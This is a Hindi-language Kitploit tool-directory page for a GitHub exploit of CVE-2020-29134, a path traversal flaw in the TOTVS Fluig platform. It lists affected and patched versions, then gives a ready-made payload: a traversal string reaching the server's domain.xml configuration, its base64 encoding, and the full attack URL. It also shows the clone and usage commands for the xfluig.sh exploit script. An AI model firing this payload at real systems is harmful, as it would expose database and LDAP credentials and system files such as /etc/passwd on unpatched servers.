Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-29134 — शोषण CVE-2020-29134 - TOTVS Fluig प्लेटफ़ॉर्म - पथ ट्रैवर्सल | Kitploit
उपकरण/GitHubGitHub/ls4ss/cve-2020-29134
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubls4ss/cve-2020-29134

CVE-2020-29134

शोषण CVE-2020-29134 - TOTVS Fluig प्लेटफ़ॉर्म - पथ ट्रैवर्सल

रिपॉजिटरी देखें
3134 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Totvs Fluig प्लेटफॉर्म

root@kitploit:~
 Fluig एक उत्पादकता और सहयोग प्लेटफॉर्म है जो ERP सिस्टम और आपकी कंपनी के अन्य सिस्टम के साथ एकीकृत होता है, ताकि आप और आपकी टीम जिस तरह से काम करते हैं उसमें क्रांतिकारी बदलाव लाया जा सके।

CVE-2020-29134

root@kitploit:~
 TOTVS Fluig प्लेटफॉर्म base64 में एनकोडेड पैरामीटर के माध्यम से पथ ट्रैवर्सल की अनुमति देता है। जब इसका शोषण किया जाता है, तो यह कमजोरी संवेदनशील XML फ़ाइलों को पढ़ने की अनुमति देती है, जिनमें डेटाबेस तक पहुँचने के लिए डेटा और कुछ मामलों में LDAP कनेक्शन और ERP सिस्टम एकीकरण होता है। इसके अलावा, /etc/passwd और /root/.bash_history जैसी सिस्टम फ़ाइलों का पता लगाना भी संभव है।
 

प्रभावित संस्करण

root@kitploit:~
--
<== Fluig Lake 1.7.0
<== Fluig 1.6.5
<== Fluig 1.6.4
...

पैच किए गए संस्करण

root@kitploit:~
<== Fluig Lake 1.7.0-210303 (Patched)
<== Fluig 1.6.5-210308 (Patched)
<== Fluig 1.6.4-210308 (Patched)

पेलोड बनाना

वैकल्पिक पाठ

हमला वेक्टर

root@kitploit:~
 http://fluig.host.com/volume/stream/Rmx1aWc=/

पथ ट्रैवर्सल सादा पाठ

root@kitploit:~
 ?t=1&vol=Default&id=1&ver=1000&file=../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml

पथ ट्रैवर्सल एनकोडेड base64

root@kitploit:~
 P3Q9MSZ2b2w9RGVmYXVsdCZpZD0xJnZlcj0xMDAwJmZpbGU9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZmx1aWcvYXBwc2VydmVyL2RvbWFpbi9jb25maWd1cmF0aW9uL2RvbWFpbi54bWw=

पेलोड

root@kitploit:~
 http://HOST.FLUIG.COM/volume/stream/Rmx1aWc=/P3Q9MSZ2b2w9RGVmYXVsdCZpZD0xJnZlcj0xMDAwJmZpbGU9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZmx1aWcvYXBwc2VydmVyL2RvbWFpbi9jb25maWd1cmF0aW9uL2RvbWFpbi54bWw=
 

Exploit-DB संदर्भ

root@kitploit:~
 https://www.exploit-db.com/exploits/49622

 

रिपॉजिटरी क्लोन करें

root@kitploit:~
 # git clone https://github.com/lucxssouza/CVE-2020-29134.git
 # cd CVE-2020-29134
 # chmod +x xfluig.sh

उपयोग

root@kitploit:~
 Ex1: ./xfluig.sh http://fluig.host.com REQUESTS_WFUZZ (wfuzz द्वारा उत्पन्न अनुरोधों की संख्या)

 Ex2: ./xfluig.sh http://fluig.host.com:PORT
टूल डाउनलोड करें